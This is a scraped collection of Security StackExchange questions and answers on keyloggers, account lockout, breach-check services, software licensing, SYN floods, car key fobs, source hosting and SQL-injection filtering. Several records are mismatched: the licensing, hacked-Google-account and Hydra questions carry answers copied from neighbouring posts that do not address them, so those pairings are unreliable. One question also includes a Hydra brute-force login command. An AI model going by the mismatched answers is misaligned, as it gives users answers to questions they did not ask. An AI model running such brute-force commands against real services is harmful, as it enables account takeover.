201,449 | My question is about the text that I type on a keyboard while in a web browser. I understand that if the website has HTTPS the connection from my browser to the website is secure/encrypted, but what about the text that I type on the keyboard on the local computer? For example, at an internet cafe, if you open a Chrome window and go to a secure site (HTTPS) is the text that you type on the keyboard secure from the keyboard to the browser? Can key logging software on the local computer access the text? My concern is logging into my email account (or any other private account) on a public computer, can the password that I type be intercepted? If so, is there any way for a user of a public computer to ensure the privacy of their password in this scenario? | No, your data is not safe from key loggers on a local computer. There isn't much more to say here, to be fair. A key logger will grab and save any key stroke entered. The tls (https) encryption happens "after" the driver from keyboard "sends" those key strokes to the browser, "through" the key logger. Even if encryption is being used and there isn't one many types of spyware on the computer, the connection between the computer and site might have a Man in The Middle (MiTM) device in between which tricks your computer into thinking it's using encryption when it's not. Good question. Yes, on a public kiosk you run the risk of credential harvesting. I can not think of anything that would bypass keylogging software (VPN will fix MiTM issues). Beware. | {
"source": [
"https://security.stackexchange.com/questions/201449",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196995/"
]
} |
201,566 | Some websites display a remaining password retry count when I input wrong passwords more than twice. For example, displaying that there are 3 retries remaining until locking out my account. Is this dangerous from security perspective ? | Locking accounts is a bad idea in the first place. It might seem like you're making your organization more secure by keeping out "bad people" who are "guessing" at passwords using brute force attacks, but what have you really solved? Even with this policy and a perfect userbase who never makes security mistakes, an attacker can perform a denial-of-service attack on your organization by repeatedly using the password "aaa" to lock out the accounts of critical users. Consider what happens if your attacker gets a copy of the list of usernames for your entire IT department: Suddenly, IT itself — the organization that would otherwise be able to unlock other users — is itself completely shut down. Always consider what the threat model is before implementing a policy. A "bad guy" determined to hurt your organization will find alternative attack vectors. Your lockout policy won't even faze a nation-state actor (like Russia or China or the NSA); a determined hacker will just find other ways around it (like social engineering); and it will only hurt legitimate users of your service, no matter how low or high you set the lockout counter. Moral of the story: Don't lock out accounts. Instead, do what Apple does with the iPhone: Each login try doubles the login delay, so that after a dozen failures or so, you have to wait one hour between each successive attempt. That's long enough to prevent "bad guys" from performing brute-force attacks, but still short enough that a legitimate user can spend that hour figuring out what their password was and typing it in properly after lunch — or contacting IT and apologetically asking for help. (Similarly, "flooding" policies can often be implemented at the IP-address level in your firewall, not just at the user-account level in your software, if you're concerned about a dedicated attacker trying to brute-force many different accounts.) And if you don't lock out accounts, you don't need to have a counter — or display it. [ see also: this excellent answer on a similar question ] | {
"source": [
"https://security.stackexchange.com/questions/201566",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/194974/"
]
} |
201,654 | There is a new big case of stolen login/password data in the news . At the same time, I am reading that there are services that let you check if your own login data is affected, e.g. Have I Been Pwned . Is it safe to enter my email address there to find out whether I need to change my passwords? | This question was explained by Troy Hunt several times on his blog, on Twitter and in the FAQ of haveibeenpwned.com See here : When you search for an email address Searching for an email address only ever retrieves the address from storage then returns it in the response, the searched address is never explicitly stored anywhere. See the Logging section below for situations in which it may be implicitly stored. Data breaches flagged as sensitive are not returned in public searches, they can only be viewed by using the notification service and verifying ownership of the email address first. Sensitive breaches are also searchable by domain owners who prove they control the domain using the domain search feature . Read about why non-sensitive breaches are publicly searchable. See also the Logging paragraph And from the FAQ : How do I know the site isn't just harvesting searched email addresses? You don't, but it's not. The site is simply intended to be a free service for people to assess risk in relation to their account being caught up in a breach. As with any website, if you're concerned about the intent or security, don't use it. Of course we have to trust Troy Hunt on his claims, as we have no way of proving that he is not doing something else, when handling your specific request. But I think it is more than fair to say, that haveibeenpwned is a valuable service and Troy Hunt himself is a respected member of the infosec community. But let's suppose we don't trust Troy: what do you have to lose? You might disclose your email address to him. How big of a risk is that to you, when you can just enter any email address you want? At the end of the day, HIBP is a free service for you(!) that costs Troy Hunt money. You can choose to search through all the password databases of the world yourself if you don't want to take the risk that maybe a lot of people are wrong about Troy Hunt, just because then you would disclose your email address. | {
"source": [
"https://security.stackexchange.com/questions/201654",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197097/"
]
} |
201,659 | I'm trying to make a good licensing system without affecting user's experience and at the same to make it as secure as possible. I know it's impossible to make it 100% secure, but I would like to make it harder. My program is made to be used only when the user has internet connection (not because I hate my users, but because my program is for another online app), that's why I don't care if the user doesn't have internet connection. What I thought so far: Registration: User downloads the software from a public permanent link (mega or something). User buys the software and receives a unique key on his mail (this key is then wrote on my DB) User opens the software and registers a new account with Username, Password and the key he received via e-mail. At the same time information about it's pc is sent (will cover that later) (This information is sent with HTTPS POST) API checks if the key is not already used and writes Username, Password and PC information on that key's row. Login: User opens software and writes Username and Password. Username, Password, PC information and Current time is sent to the server (HTTPS POST). Server checks Username, Password and PC information and sends an
answer based on the current time (Using Echo on php) (to make answer unique,
idk if this is useful, read last question on "What I didn't think about yet"). Every 1 or 2 minutes the software does 3. again to check if the information
didn't change. There is a "Reset" button in case the users changed something in their Computers that made the key obsolete. This will ask the user to login, then will replace Computer's information with the new one. Computer information: I'm still thinking about this, maybe Hardware information that cannot be faked, or something. I need all this information to be as hard to fake as possible and not changed so frequently that my users would have to reset their account every day/week. What I didn't think about yet: What happens if the user tries to fake the Computer information, how should the server check that the information is wrong. Like if the key becomes "00000000" because all the data is NULL, empty or 0. What happens if there are 2 Computers with the same information (for example,
notebooks). Users would be able to use same serial / account for both computers. How often will this happen? Answered after investigating. This has a low chance, and if this happens, they would still have to know each other so they share their serial keys. What happens if someone gets the source code of my program? Will it have any consequence on the rest of the users? Answered by @vidarlo Is it possible to fake the answer from the server? What should I do to prevent that? Answered by @vidarlo After thinking about this system I noticed that I don't have any kind of serial key generated from user information. (I mean, I send Computer information to the server to compare instead of making a serial key with it and giving the user this serial key). Does this make my system bad? To be honest, I read a lot and came with this Schema that I "tested" in my mind to see if I find any easy way to bypass (I mean things like "if you block internet connection then the program will work without license"). Now after "testing" it in my mind, I need more experienced users to give me some advice.
This will be my main source of money while I'm studying and I'm trying to protect it as much as possible. A good link I found was how XP license system works: https://www.licenturion.com/xp/fully-licensed-wpa.txt But is not very useful because I don't use any kind of serial key containing user information. I don't know if this is the page for this, I decided to post this here because I'm not asking about code or "how do i do the following", I'm asking if this is easy to bypass. Everything is appreciated, I'm still on the first step (thinking about everything and checking if it fails before I start to code it). I continued researching and couldn't find any problems with this Schema (I'm omitting the problem that someone edits my exe because there is nothing I can do about it) But still I need more opinions because I don't have a lot of experience, and this would be my first licensing system. | This question was explained by Troy Hunt several times on his blog, on Twitter and in the FAQ of haveibeenpwned.com See here : When you search for an email address Searching for an email address only ever retrieves the address from storage then returns it in the response, the searched address is never explicitly stored anywhere. See the Logging section below for situations in which it may be implicitly stored. Data breaches flagged as sensitive are not returned in public searches, they can only be viewed by using the notification service and verifying ownership of the email address first. Sensitive breaches are also searchable by domain owners who prove they control the domain using the domain search feature . Read about why non-sensitive breaches are publicly searchable. See also the Logging paragraph And from the FAQ : How do I know the site isn't just harvesting searched email addresses? You don't, but it's not. The site is simply intended to be a free service for people to assess risk in relation to their account being caught up in a breach. As with any website, if you're concerned about the intent or security, don't use it. Of course we have to trust Troy Hunt on his claims, as we have no way of proving that he is not doing something else, when handling your specific request. But I think it is more than fair to say, that haveibeenpwned is a valuable service and Troy Hunt himself is a respected member of the infosec community. But let's suppose we don't trust Troy: what do you have to lose? You might disclose your email address to him. How big of a risk is that to you, when you can just enter any email address you want? At the end of the day, HIBP is a free service for you(!) that costs Troy Hunt money. You can choose to search through all the password databases of the world yourself if you don't want to take the risk that maybe a lot of people are wrong about Troy Hunt, just because then you would disclose your email address. | {
"source": [
"https://security.stackexchange.com/questions/201659",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197108/"
]
} |
201,788 | There's a lot of news right now about haveibeenpwned but I don't understand why people need a service like that in first place. If you're a security conscious user, you'd change your passwords regularly on any website that matters (banking, email, paid services) and thus leaks would not affect you in the first place. By 'changing your password' I refer to creating a randomly generated password string for each service, not the enforced changing of passwords in corporate environments. So why are people so interested in using haveibeenpwned? Why not follow the right security practices regardless of any leaks? | Your question contains several false assumption: If you're a security conscious user, you'd change your passwords regularly on any website that matters According to my password manager I have more than hundreds of accounts and most of them would do harm to me if compromised. Changing all of them regularly (like every 90 days) is a huge amount of work. So I use strong passwords generated by the password manager instead. But some services still save passwords in clear text. and thus leaks would not affect you in the first place. Let's say I would change every password every 90 days. There is still the possibility that there are 89 days where my account is compromised and the attacker has time to do anything including changing my password. When you know your account is in the list, you can act instantly. Why not follow the right security practices regardless of any leaks? See previous point. So why are people so interested in using haveibeenpwned? To know which accounts are affected and to figure out which service got hacked/where the accounts came from. With this knowledge: I can change the password instantly. I know which service is less trustworthy for sensitive data, money, ... and I might close my activity at this service. If this service has a messaging system I know to be more alert of messages from "friends" because the account might be stolen. I know which of my data might be compromised (data at the hacked service). | {
"source": [
"https://security.stackexchange.com/questions/201788",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47028/"
]
} |
201,836 | I'm a student and it seems every school or university I have been to has one password that you set for your user account for logging in to university services, which is also then synced to external services the university use such as blackboard, fronter, dropbox, Office 365 e-mail, etc. Lesson 1 of cybersecurity is not to store passwords in plain text or to encrypt them. But instead to use some sort of hashing algorithm. If this is true how can a university's IT service automatically sync password for all the relevant accounts? I can understand how this can be done by using APIs each time to update all the services when a password change has been requested, but it would then make it impossible to adopt a new service without the user re-entering their password. How is it done? or are they just holding passwords in plain text? | It's usually not that passwords are "synced" between services, but rather a centralized authentication service is used. In many cases, this is going to be a Microsoft Windows domain controller running an Active Directory server (others exist e.g. FreeIPA), which other services can talk to using LDAP and Kerberos. The typical setup has all user accounts added to the directory server (which is usually replicated across multiple servers transparently for redundancy and reliability purposes). Locally hosted applications (e.g. Blackboard) will have the directory server's LDAP information entered into the server settings as an authentication provider. When a client enters their credentials on the web interface, the application may check the credentials against a local database as well as LDAP services that have been configured. If the LDAP server confirms a successful authentication, information about the user (contact info, group membership, etc.) can be retrieved to populate parts of the application. When user information is updated somewhere, the data on the directory server is changed so that the change will be visible everywhere else. This applies to changing the password. Not all applications will use LDAP directly; external services such as Office 365 or Google Apps suite and others may instead use single sign-on (SSO), where you authenticate through your organization's login page and these external services are able to effectively reuse this authentication (e.g. through SAML). On the directory server, passwords are stored as hashes within each user object. The hashes are protected further using LDAP access controls (so any LDAP client can't just pull hashes) and are encrypted with a key from the registry (in the case of Windows Active directory). In short, this is just scratching the surface. There are a number of ways to set up a network and services to use centralized authentication. But almost every organization uses some type of this system; like you said, it would be very difficult and insecure to do manually in most cases. | {
"source": [
"https://security.stackexchange.com/questions/201836",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197339/"
]
} |
201,992 | What analysis was Bruce Schneier referencing when he wrote: Viruses have no “cure.” It’s been mathematically proven that it is always possible to write a virus that any existing antivirus program can’t stop. From the book Secrets & Lies by Bruce Schneier, page 154. | Under one possible interpretation of that, it's a result of Rice's theorem . A program is malicious if it performs some malicious action, which makes it a semantic property. Some programs are malicious and some aren't, which makes it a non-trivial property. Thus, by Rice's theorem, it's undecidable in the general case whether a program is malicious. | {
"source": [
"https://security.stackexchange.com/questions/201992",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197545/"
]
} |
201,994 | Recently my google account was hacked. I have 2-factor authentication turned on. 2-factor authentication was not required for the hacker to gain access to my account, nor did the hacker trigger Google's suspicious activity monitor. This is because the log in was enacted from a "trusted device" or so it seems. However, the log-in was from a location I never visited with a device name I do not know. See attached image: The hacker managed to gain access to my bank account and other various accounts without triggering any of their 2-factor authentication blocks. One more note: When the attack occurred, the device that I brought with me to Israel and then back to New York, as far as I can tell, was turned off; so it is unlikely that the hacker gained remote access to that device... but then again... maybe they did? Any idea what happened to me and how I can make sure it doesn't happen again? (They also managed to get access to my bank account, add a wire recipient (a process I usually have to verify over the phone with a human), and make a successful wire transfer... but let's stick to the Google question) For the record, I have changed all of my passwords and ran a virus scan that came out without results. But since the 2-factor authentication was enabled on literally all of my services, there wasn't much more I could do. Help! | Under one possible interpretation of that, it's a result of Rice's theorem . A program is malicious if it performs some malicious action, which makes it a semantic property. Some programs are malicious and some aren't, which makes it a non-trivial property. Thus, by Rice's theorem, it's undecidable in the general case whether a program is malicious. | {
"source": [
"https://security.stackexchange.com/questions/201994",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197537/"
]
} |
202,022 | UPDATED We have a very unique scenario: We have several old databases of user accounts. We'd like a new system to be able to connect these old accounts to new accounts on the new system, if the user wishes it. So for example, on System X you have an old account, with an old, (let's say) RPG character. On System Y you have another old account, with another RPG character on it. On our new system, with their new account, we'd like our users to be able to search these old databases and claim their old RPG characters. (Our users want this functionality, too.) We'd like to keep users' old account PII in our database for the sole purpose of allowing them to reconnect old accounts of their new accounts. This would benefit them and be a cool feature, but under GDPR and our privacy policy we will eventually need to delete this old PII from our databases. BUT - What if we stored this old PII in such a way as that it was irreversible. I.e. Only someone with the information would ever get a positive match. I'm not a security expert, but I understand that simple hashing (eg. MD5) is too far easy to hack (to put it mildly), and (technically) doesn't require "additional information" (ie. a key). The good thing about MD5 is that it's fast (in the sense that it's deterministic), meaning we could scan a database of 100,000s rows very quickly looking for a match. If MD5 (and SHA) are considered insecure to the point of being pointless, what else can we do to scan a database looking for a match? I'm guessing modern hashing, like bcrypt, would be designed to be slow for this very reason, and given that it's not deterministic means that it's unsuitable. If we merged several aspects of PII into a field (eg. FirstnameLastnameEmailDOB) and then hashed that, it would essentially become heavily salted. Is this a silly solution? | MD5 or SHA is not the concern. Hashes can be used for pseudonymization. The problem is that the hash would need to be salted (or peppered) so that data from other sources could not be used to identify the person. My email is the same everywhere. A hash of it would also be the same. So that means that, in this case, the hash and my email become synonymous. Just like a username and the legal name of a person if paired. If you use a hash in this case, you actually gain nothing in terms of GDPR. Hashing with a salt (or pepper) makes de-anonymising nearly impossible without knowing the added value. The salt (or pepper) almost becomes the token, in this case. As always, check with your DPO. | {
"source": [
"https://security.stackexchange.com/questions/202022",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1662/"
]
} |
202,026 | My understanding of remote car key fobs, and similar security devices with rolling codes, is that the key device is a transmitter that, each time the button is pressed, sends the next secret in a known sequence that is unique to the key. It does not contain a receiver. Meanwhile, the receiver in the car tracks (for each key fob it recognises) what it expects the next secret to be, and only unlocks if it receives the correct code. There is a risk that a transmission maybe lost - e.g. the button pressed when out of range - so the receiver actually accepts any of the next few secrets in the sequence. I have heard of one system that allowed a window of up to 256, but I don't know if that number is correct and whether it is typical. If my understanding is correct, it is possible to render a key fob useless (i.e. perform a denial of service attack on the owner) by pressing the button at least 256 times while out of the range of the car. This obviously relies on access to the key fob, but not when the car is close - which is a time the user may be less vigilant. So, if a friend gets drunk in a pub, I can make sure they can't drive home by rapidly pressing their car remote 300 times while they are in the bathroom. It has always bothered me that such an attack is possible, and yet I have never heard of anyone performing it, which makes me doubt that I have understood this completely. | it is possible to render a key fob useless by pressing the button at least 256 times while out of the range of the car. Not useless, but desynchronized. Any car will allow you to re-synchronize, and one example of a typical procedure is: Turn the ignition key on and off eight times in less than 10 seconds. This tells the security system in the car to switch over to programming mode. Press a button on all of the transmitters you want the car to recognize. Most cars allow at least four transmitters. Switch the ignition off. yet I have never heard of anyone performing it You don't have any 3-year olds around? My older daughter did that... She got the garage door remote when we were putting things on the car, and after driving 10 minutes without her complaining about anything, I saw her pressing buttons on the remote... Got home to a desynchronized remote. Three-year-olds can be dangerous, relentless attackers, so take care with the physical security of your key fobs. | {
"source": [
"https://security.stackexchange.com/questions/202026",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40146/"
]
} |
202,326 | I'm working on an application that is completely built upon user interaction. In my application logs, I log each interaction and print the email address to uniquely identify which user did which interaction. This application log will not be visible to anyone other than: Me The next owner of the application if I would sell the project An administrator I might hire if the workload gets too big An example of a log record is something like this: 2019-01-24 14:27:20.954 INFO 32256 --- [whatever-info] s.p.s.t.d.m.s.SomeClassThatPrintsTheLog : Registering user with email address [email protected]. Is this allowed under GDPR or should I mask the printed email address in any way? Or use another solution? | The goal of GDPR is about protecting personally identifiable information (PII) as much as possible. The interaction of a specific user with your application are pretty sure such PII. If you really need to log this information you should inform your user about this process, i.e. the purpose of the data collection, how long the information gets stored and who gets access to the data. And you and whoever you sell the application to should never use the data for any other purpose as agreed to by the user. And of course you need to properly protect the information against misuse, i.e. use outside of the specified purpose. This specifically but not only includes if someone hacks into your application or server and steals this data. Since use of the data is limited and protection (and fines) can be costly, it might be easier to not store these information in the first place. An alternative is to at least pseudonymize the PII as much as possible, i.e. in a way that the logged data are still usable for you but that no association to a specific user can be done even when having all the logged data. But since it is not really clear what you use these logs for no recommendations can be done for a specific process of such pseudonymization. Be aware though that simply replacing each unique email address with another unique identifier might not be a sufficient pseudonymization. Depending on the data you log it might be possible to create user profiles and based on specific traits in the profiles associate these to real world users. See AOL search data leak for an example how such simple pseudonymization attempt went wrong. | {
"source": [
"https://security.stackexchange.com/questions/202326",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197969/"
]
} |
202,355 | I stumbled upon this sshesame software which appears to imitate an SSH server accepting any username/password, only instead of executing the subsequent shell commands it logs them in a file. What I can't figure out is what possible use this tool might have (besides educational). As such, it only attracts unwanted attention to the server because of successful SSH login attempts, and it won't protect any other ports from being attacked (including the real SSH), so it visibly only makes the situation worse. Did I overlook something? | The reasons to have such fake SSH servers are multiple. They include such as: determining whether you’re under attack knowing the users and passwords guessed (which can display the intel the attacker has) to see attacker’s actions of interest to see attempts of exploitation of the server (might disclose 0days or backdoors) to study how the attacker tries to approach the system
and so on. test client software, including audit / testing / attack tools during development (thanks to Mołot ) You should consider NOT putting up a fake SSH server on your system if you have anything of value in the server, since the fake server might be prone to vulnerabilities as well - one closed port is better than one open service . | {
"source": [
"https://security.stackexchange.com/questions/202355",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71607/"
]
} |
202,481 | I've found a little vulnerability in a web application running on Node.js server. It works by sending some crafted payload to the application server, which makes the application server code to throw an error and due to lack of error handling - It crashes (until someone runs it again). I'm not sure what is the appropriate name for this kind of attack.
I assume it's a DOS ( Denial Of Service ) attack because it makes the server Deny Serving its clients.
On the other hand, Until now, I've only heard of DOS attacks which works by flooding the server in some way (which isn't the case here). So, is it correct to consider it as a DOS attack?
If the answer is no, so how should it be called? | Yes. Any attack which has as a goal to deny the normal usage of a service by legitimate users is by definition a DoS (Denial of Service). | {
"source": [
"https://security.stackexchange.com/questions/202481",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198166/"
]
} |
202,534 | Let's say someone has my encrypted data and he wants to decrypt it. People always talk about how the length of the key (e.g. 256 bits) decides about the entropy of the encryption, which totally makes sense. If the attacker tries all 2 256 possibilities, his great-great-…-grand-children will have my data. But what if all the years he was using the wrong algorithm? Isn't the choice of the algorithm itself adding entropy as well or am I wrong to assume this? So instead of naming my file super_secret.aes256 I would just name it super_secret.rsa256 or maybe even not give it a file ending at all? | If you’re designing a cryptosystem, the answer is No . Kerckhoffs's principle states “A cryptosystem should be secure even if everything about the system, except the key, is public knowledge.” Restated as Shannon's maxim, that means “one ought to design systems under the assumption that the enemy will immediately gain full familiarity with them.” Making the assumption that the attacker won’t learn your algorithm is security through obscurity , an approach to security that is considered inadequate. Relying on the attacker to not know the algorithm won’t add any work on his or her end, because according to Kerckhoff, he or she either knows it, or can be reasonably expected to find out. If it adds no uncertainty it adds no entropy. And their capabilities are not something you can quantify. In the case of a lost cryptosystem, like you describe, there is usually enough historic or statistical information to determine the nature of the algorithm (if not the key itself.) But you can’t design a system under the assumption that it will be lost as soon as it’s used. That’s OpSec, not cryptography. EDIT Comments have mentioned using algorithm selection as a part of the key. The problem with this approach is that the algorithm selection must necessarily be determined prior to the decryption of the data. This is exactly how protocols such as TLS work today. If you’re truly looking to mix algorithms together and use a factor of the key to determine things like S-box selection, etc., you’re effectively creating a singular new algorithm (adopting all the well-known risks that rolling your own algorithm entails.) And if you’ve created a new algorithm, then all of the bits of the key are part of that entropy computation. But if you can point out specific bits that determine algorithm instead of key material, you still have to treat them as protocol bits and exclude them. Regarding secrecy of the algorithms, your protocol may be secret today but if one of your agents is discovered and his system is copied, even if no keys are compromised the old messages are no longer using secret algorithms. Any “entropy” you may have ascribed to them is lost, and you may not even know it. | {
"source": [
"https://security.stackexchange.com/questions/202534",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198205/"
]
} |
202,827 | We are developing a kind of social platform. It starts as a closed beta for a limited number of users, but the goal is to reach millions of subscriptions. We are currently limited on resources, both infrastructure and e.g. DevOps. So we are using GitLab for versioning our source code. Let's assume, we make it and in few years the service has million users. How do you feel about using GitLab for versioning of the source code at this stage?
Do you see it as a significant security threat? A few reasons to consider: there is no possible real warranty that staff from GitLab cannot investigate the source and find security holes or some sensitive configuration. GitLab staff could sell sourcecode to some third party GitLab may be forced to provide the sourcecode to some government, without us to know it I know the points will sound paranoid. The purpose of the network is completely legal and ethical, but I believe any service of this kind must protect the privacy of its users. The plan is to move to our private servers later, but we have to start somehow. So, do you think it is OK to use private GitLab or Bitbucket repositories for the early phase of the project, or is it an unacceptable security threat? Disclaimer: I don't claim GitLab would do anything of the described. | Unfortunately, you are the ones responsible of seeing if your threat model is justified or not. Therefore, we cannot simply give a definite "yes" whether we see using the platform as a security threat or not. However, there are two points that I'd like to expand on: You seem to be extremely worried about the source code containing vulnerabilities and that the disclosure of it would mean that an individual or party could identify them. Personally, I would not feel confident about providing a service to users where its security relies on the source code not being open source. To me, this is some sort of security by obscurity. In the best world, you want your platform to be as solid even if the code leaks. Therefore, I would highly suggest that you partner up with some pentesters/code reviewers, or at least some developers that are very security-aware. You mention wanting to move to private versioning servers. Just do this right away and be done with this. At the risk of sounding blunt, I would question your technical skills if this seems to be a complicated or expensive step considering that you are starting off. Gitlab even offers a self-hosted solution; just make sure to review the platform and to block any communications with their servers if that part worries you. Best of luck. | {
"source": [
"https://security.stackexchange.com/questions/202827",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198583/"
]
} |
202,902 | Penetration testers found out that we allow single quotes in submitted data fields, and want us to apply rules (input validation) to not allow them in any value. While I'm aware that single quotes are popular for SQL injection attacks, I strongly disagree that they should not be allowed as valid input. I am advocating for actually preventing SQL injection by means of using prepared statements (which properly quote the values) instead of filtering out anything that remotely looks like being an SQL fragment. My case: Person names can contain single quotes (such as O'Reilly ) Text fields can contain single quotes (such as I'm pretty sure ) Number fields can contain single quotes ( EUR 1'000'000 ) and many more I've seen other cases where applying SQL injection prevention rules dicarded valid data for the silliest reasons (name " Andreas " rejected because it contains an AND , and various common words in plain text fields being rejected because they contained the keywords " select ", " insert ", " update " or " delete "). What's the security professionals' stance on that matter? Shall we reject implementing input validation for single quotes for the reasons I stated? | You should implement input validation as a defense-in-depth method. So input validation should not be your primary defense against SQL injection, that should be prepared statements. As an additional defense you should restrict the allowed inputs. This should never ever restrict functionality. If there is a legitimate use case to have apostrophes in input, you should allow it. So you should allow single quotes in name fields, descriptions, passwords, but not in number fields, username fields, license plate fields. To block single quotes in all input is madness. This breaks functionality of the application and isn't even the correct solution against SQL injection. Consider the possibility that you misunderstood the pentesting company. If this is seriously their advice, this reflects badly on the pentesting company and I would advise you to search for a pentesting partner that helps to properly secure your software, instead of making it unusable. | {
"source": [
"https://security.stackexchange.com/questions/202902",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40685/"
]
} |
202,965 | I'm new to inspecting packets with Wireshark so this might be something very stupid on my part. That said, I don't really understand the transaction between my computer and my Roku. 17 1.129097 192.168.1.70 192.168.1.64 HTTP 248 GET /dial/com.spotify.Spotify.TVv2 HTTP/1.1 My computer is 70 and my Roku is 64. This is the entire HTTP follow: Client GET /dial/com.spotify.Spotify.TVv2 HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip
Keep-Alive: 0
Host: 192.168.1.64:8060
User-Agent: Spotify/109800078 OSX/0 (iMac18,1) Server HTTP/1.1 404 Not Found
Server: Roku UPnP/1.0 MiniUPnPd/1.4
Content-Length: 0 I don't have anything related to Roku installed on my computer but I do have Spotify running. | It appears to be a feature called Spotify Connect . Spotify allows you to play music from you phone or computer using your Roku or smart TV, as most people will likely have better sound systems for their TVs than for their computer. Presumably your Spotify desktop app is automatically scanning your LAN and querying compatible devices to be able to offer this feature. In your case it looks like you have a compatible Roku, but the app isn't installed on it, so it returns a 404. | {
"source": [
"https://security.stackexchange.com/questions/202965",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198727/"
]
} |
203,193 | What is the purpose of using random IP addresses in SYN Flood Attack ? | A client opens a TCP connection by sending a SYN packet to a server. The server replies with a single SYN+ACK, and the client responds again with an ACK. Because of natural network latency, the server may wait a short time after sending SYN+ACK to the specified source address for an ACK reply, and this behavior is what a SYN flood exploits. Because the source address was spoofed, the reply will never come. If the server is waiting on enough fake connections that will never be completed, it will become unable to open any new connections, legitimate or not. This condition is called denial of service. SYN flood attacks do not require the attacker receive a reply from the victim, so there is no need for the attacker to use its real source address. Spoofing the source address both improves anonymity by making it harder to track down the attacker, as well as making it more difficult for the victim to filter traffic based on IP. After all, if each packet used the same source address (whether spoofed or not), any decent firewall would quickly begin blocking all SYN packets from that address and the attack would fail. | {
"source": [
"https://security.stackexchange.com/questions/203193",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198972/"
]
} |
203,436 | I've just downloaded and executed a piece of malware on my computer. I don't have much time right now, so I just powered it off (turned it off via the Start menu), hoping that it won't be able to steal any data or do malicious activities until I can nuke it from orbit. Is it enough to prevent the malware to continue to carry out malicious
activities? Can the malware power on my computer? Should I also unplug it and remove its battery? | TL;DR Yes, but it's unlikely. Just to be sure, either unplug the PC or ensure it can't connect to anything. Several operating systems - notably Windows 10 - have the possibility of setting " automatic wakeup ", using appropriate drivers and related, complicated hardware management. As a result, IF (and that's a big if!) a malware program has gained sufficient access to have the operating system do its bidding, it has a way to simply ask the system itself to do this on its behalf. On some systems (that the malware must be able to recognize and plan for), this holds for "true powerdown" also: additional circuitry will turn the computer on at a preselected time of the onboard Real Time Clock. In a less software-accessible manner this is available on some desktop BIOSes ("Power up automatically: [ ] Never; [ ] After power loss; [ ] Every day at a given time: : " or similar, in the BIOS setup). Then, the system will automatically power up after some time, for example at a time when you're likely to be asleep. So: there is RTC powerup hardware support, or more (integrated management systems, common on enterprise computers) the malware must already have taken control of the system, since RTC functions usually require administrator/root level access. RTC powerup HW support not present, or not used: if the malware has taken control of the system, it can have replaced the shutdown procedure with a mere going into sleep , and set up things to exit sleep mode at a later time. But did either of these options happen? Probably not. Most malware rely on being run unwittingly and being able to operate without being detected for some time. The "power off simulation" is only useful in very specific scenarios (and the hardware option is only available on comparatively few systems), and I don't think it would be worthwhile for a malware writer to worry themselves with them. They usually go with the third and easiest option: some of the usual automatic power-up or logon sequences (autoexec, boot scripts, scheduled tasks, run services and so on) is subverted so that additional code, namely, the malware, is silently run. For a "targeted" malware, designed with some specific victim in mind and tailored to the specific target's capabilities, rather than the subset available on the average infected machine, all the qualifications above wouldn't come into play. | {
"source": [
"https://security.stackexchange.com/questions/203436",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76718/"
]
} |
203,478 | My stock Android 9.0 gives me the option of showing some short text message on the lock screen. I want to add my email address here, so people know how to contact me if they find my phone. Are there any downsides to this? The address is linked to the Google account that's used on this phone. I know there are other options for getting my phone back, like find my phone, but I want a method that allows the finder to find me instead of the other way around. | Your email address is generally public knowledge, so disclosing it is often not a big security risk. But it gets complicated when it's your phone. Because your email address is often used as your username to log into services, and you (should) use your phone as a second factor when logging in, tying those two pieces of data might have unintended consequences. Yes, you (should have already) encrypt your phone and you (should) have a strong password to log into your phone, but there are risks depending on how you implemented everything. The better option to do what you want is to display a secondary address that you do not use as a username anywhere. This is easy to do and to simply forward all emails from there to your primary address. | {
"source": [
"https://security.stackexchange.com/questions/203478",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/98655/"
]
} |
203,501 | Trying for the life of me to get Hydra to work with a JSON request. General: Request URL: https://api.myapp.app/api/accounts/login/ Request Method: POST Status Code: 401 Unauthorized Remote Address: xx.xxx.xxx.xxx Referrer Policy: no-referrer-when-downgrade Response Headers: Access-Control-Allow-Methods: GET, POST Request Headers: Content-Type: application/json Origin: https://myapp.app Referer: https://myapp.app/login User-Agent: Mozilla/5.0 Request Payload: {username: "root", password: "toor"}
password: "toor"
username: "root" Response for Invalid Login: {"error":"username or password incorrect"} I have tried many iterations, but keep getting the following error message:
Receiving the following error message: [ERROR] Invalid target definition! hydra https://api.myapp.app https-form-post "api/account/login:username=^USER^&password=^PASS^:F={\"error:\" \"username \" \"or \" \"password \" \"wrong\"}" -l root -p toor | Your email address is generally public knowledge, so disclosing it is often not a big security risk. But it gets complicated when it's your phone. Because your email address is often used as your username to log into services, and you (should) use your phone as a second factor when logging in, tying those two pieces of data might have unintended consequences. Yes, you (should have already) encrypt your phone and you (should) have a strong password to log into your phone, but there are risks depending on how you implemented everything. The better option to do what you want is to display a secondary address that you do not use as a username anywhere. This is easy to do and to simply forward all emails from there to your primary address. | {
"source": [
"https://security.stackexchange.com/questions/203501",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199492/"
]
} |
203,521 | I am a security member of a small company which recently got contacted by someone claiming to be a Hackenproof member.
